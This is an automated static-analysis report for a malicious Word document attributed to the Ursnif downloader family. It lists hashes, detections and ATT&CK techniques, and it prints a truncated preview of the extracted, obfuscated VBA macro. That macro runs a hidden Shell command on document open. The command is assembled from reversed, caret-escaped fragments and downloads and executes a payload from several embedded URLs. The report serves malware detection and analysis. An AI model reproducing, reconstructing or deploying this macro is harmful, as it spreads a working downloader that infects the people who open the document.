Ursnif — Office (OLE) malware analysis

Static analysis result for SHA-256 611df394bbb30dea…

MALICIOUS

Office (OLE)

66.1 KB Created: 2018-09-10 10:36:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: b252a0b16e0f81a62e9438d845a22202 SHA-1: cca245bac8bb18603e32c667b41d7514bce9c1f8 SHA-256: 611df394bbb30dead4e6bed259e36a03851b6fb1c7fa83b9ce59f59a8a78b56a
182 Risk Score

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute arbitrary commands. The ClamAV detection explicitly identifies it as URSNIF, a known downloader family. The script's primary function is to download and execute a second-stage payload, as indicated by the use of Shell() and the nature of URSNIF.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6020 bytes
SHA-256: d2d0698dd984cd98fbca1ab4d930bd2df71b56d1f84a87d8cad859164bc392e5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "jZcGHmQwbPGUQw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "ZwiPUzhAzBT" + "8105"
   Second "FtHUPHU" + "w"
   Second "103741307" + "9903" + "SN" + "pCicvQpHZjXsc"
   Second "LN" + "lfzWPCUD" + "aa" + "ib"
   Second "wXSMNSlliSvJ" + "4310"
   Second "135" + "I"
   Second "361357105" + "9157"
Shell wqwnz + sFQvT + aHkodXiA, CStr(vbHide)
   Second "1983" + "SjEi" + "108545427" + "pl"
   Second "349329595" + "506905837" + "VP" + "9316"
End Sub



Attribute VB_Name = "iKLOuNFRN"
Function wqwnz()

On _
Error _
Resume _
Next
Second "Qz" + "134892806" + "XkYbIlQ" + "UO"
   Second "597" + "434181702" + "80186505" + "258310909"
wFVvTT = Format(Chr(9 + 4 + 0 + 7 + 79)) + "md " + "/V/" + Format(Chr(6 + 2 + 0 + 5 + 54)) + Format(Chr(3 + 1 + 0 + 2 + 28)) + "^" + "s^" + "e" + "t " + "y^s^o=" + "    ^ "
Second "KV" + "lu"
   Second "z" + "URzrD"
   Second "iDk" + "JFDkvIh" + "DvEoQjntvia" + "6118"
   Second "2365" + "u"
GcNNUfCUawQ = "^    ^ " + "^ ^  ^" + " ^ " + "^" + "  }^" + "}{h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "t"
Second "r" + "155583106" + "jVpK" + "SS"
   Second "JZZ" + "DzwJ"
   Second "6852" + "N"
ltjGrKz = "a" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^}" + "^;^ka^" + "erb;^A^" + "k^i^$^" + " " + "^m^" + "etI^-e"
Second "vWM" + "kWPj"
   Second "262290310" + "Vm" + "9965" + "HXzwFi"
   Second "6868" + "199732306"
   Second "FHGR" + "dErG"
   Second "SUS" + "mCV" + "a" + "zROj"
ZTnwEi = "kovn" + "^I;)^A^" + "ki^$^ ^" + ",^hs" + "^o" + "^$(e" + "liF^d^a" + "oln^w^" + "o"
Second "16022491" + "VQXtia" + "441950421" + "FYjT"
   Second "6943" + "hwFzd"
   Second "wY" + "E"
   Second "TWzDrcMjFjsib" + "wMnUOpP" + "tk" + "5193"
QLTmlV = "D^.ztB" + "^${^yr" + "^t" + "{)^E" + "i^U^" + "$ n^i" + "^ ^h^" + "s" + "o^$(^" + "h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "a^e"
Second "38777242" + "6917"
   Second "ItWj" + "jaHBaJuAWOkG"
   Second "MiFdPiSuQiIGP" + "GH"
qPRuYjkC = "r" + "^o^f;'" + "ex^e^" + "." + "^'+Ns^" + "l$+'\^'" + "^+"
Second "5680" + "290242265" + "pIl" + "tw"
   Second "DHcsl" + "ilsiHP"
   Second "AHzptY" + "N" + "rR" + "lSVWd"
dwhOzn = Format(Chr(9 + 4 + 0 + 7 + 79)) + "^i^l^b" + "^u^" + "p:vn^" + "e$=A^k^" + "i$^;" + "'0" + "2^3^" + "' =^ N" + "^s^" + "l^$;" + ")'^@^'("
wqwnz = wFVvTT + GcNNUfCUawQ + ltjGrKz + ZTnwEi + QLTmlV + qPRuYjkC + dwhOzn
   Second "tirU" + "Ds" + "1940" + "dD"
   Second "WXPLUPmT" + "BcU" + "vJkz" + "pSp"
End Function
Function sFQvT()

On _
Error _
Resume _
Next
Second "LpTl" + "290794446" + "MZiU" + "KrFW"
   Second "t" + "300692744" + "1594" + "O"
   Second "55027144" + "P" + "351730323" + "519982427"
RGwkaZ = "tilp^" + "S.'^T^e" + "^ydI^" + "tA/^s^" + "u"
Second "HQtOSBInERTAE" + "9362"
   Second "WQJFbY" + "kJ"
wfuDMBuSYjR = "^.ss^en" + "i" + "su^b" + "n^ag^i^" + "h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^im//" + ":" + "^ptt^h" + "@^"
Second "GPaUmTQRRawp" + "3362" + "214464197" + "X"
   Second "DrEX" + "uoswk" + "soKz" + "uGiP"
   Second "127366324" + "38" + "UpNUsVtjkIUF" + "vz"
   Second "3172" + "MWPK"
wUXfLuwooP = "l^G^h^" + "YU" + "^6zV" + "/^" + "mo" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^.^k" + "^ils^ak" + "^d^irg" + "n" + "^i//:" + "^"
Second "z" + "iVwD"
   Second "zSAoYi" + "B"
   Second "483084699" + "O" + "383246444" + "5972"
   Second "3855" + "wqjkmjtZkkkEv"
lcnDizQDHGp = "p^tth" + "^@Q^" + "e^" + "F" + "M^" + "A^xo0" + "65/mo" + Format(Chr(9 + 4 + 0 + 7 + 79)) + ".yt^l^" + "a"
Second "c" + "8806"
   Second "fsiMYfpowhV" + "8565"
   Second "tNEa" + "363209860"
BEZrj = "^" + "erem^o" + "^ha" + "^to^s^" + "ara^s//" + "^:^" + "ptth^@" + "^YY^9V" + "g" + "k^9" + "^" + "i^"
Second "wLcjPiXEYUv" + "DUOV" + "1873" + "BroEN"
QCuInBHqfdt = "q/^l^p^" + ".t^a" + "^iw" + "^k" + "^-o" + "ru^e//" + ":^"
Second "Y" + "26
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.